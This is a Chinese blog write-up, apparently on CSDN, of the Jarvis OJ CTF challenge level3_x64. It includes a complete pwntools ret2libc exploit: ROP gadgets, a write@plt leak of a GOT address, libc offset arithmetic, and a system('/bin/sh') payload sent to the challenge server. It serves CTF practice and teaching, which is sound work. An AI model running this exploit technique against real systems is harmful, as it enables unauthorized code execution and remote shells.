jarvis oj level3_x64

本文详细解析了Level3_x64的漏洞利用过程,通过分析寄存器操作和gdb调试技巧,展示了如何构造payload以实现远程代码执行。文章深入探讨了rdi、rsi寄存器的利用,以及如何通过write函数泄露地址信息,最终利用system函数执行/bin/sh命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。
先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。

0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret

根据网上wp,gdb在read处下断,验证rdx在此时等于0x200,只要大于8就可以。对于这点,我是这么理解的:我们是在vul函数里写入数据的,读取数据时调用了read(0, &buf, 0x200uLL),将rdx赋值0x200,后面直接就溢出到我们构造的栈了,没有修改rdx寄存器的值了,所以不用修改。

此时遇到地址问题,卡了两天,发现应该是虚拟机的问题,装了系统。记一些命令:
查命令地址:readelf -a libc-2.19.so | grep " system@"
查字符串地质:strings -a -t x libc-2.19.so | grep "/bin/sh"

回到题目,那么直接构造payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
recv得到服务器函数地址write_addr。同理offset=write_addr-libc.symbols[‘write’]。
脚本:

from pwn import * 
#context.log_level="debug" 
elf=ELF("level3_x64") 
write_plt=elf.symbols["write"] 
write_got=elf.got["write"] 
vul_addr=elf.symbols['vulnerable_function']

p=remote("pwn2.jarvisoj.com",9883) 
p.recvuntil("Input:\n") 
pop_rdi_addr=0x00000000004006b3   #0x00000000004006b3 : pop rdi ; ret
pop_rsi_r15_addr=0x00000000004006b1      #0x00000000004006b1 : pop rsi ; pop r15 ; ret

payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
p.sendline(payload1) 
t=p.recv(8)
write_addr=u64(t[0:8]) 
print "write_addr="+hex(write_addr) 

libc=ELF("libc-2.19.so") 
offset=write_addr-libc.symbols["write"] 
sys_addr=offset+libc.symbols["system"] 
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi_addr)+p64(bin_addr)+p64(sys_addr)+"ret-addr"
p.sendline(payload2) 
p.interactive()
p.close()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值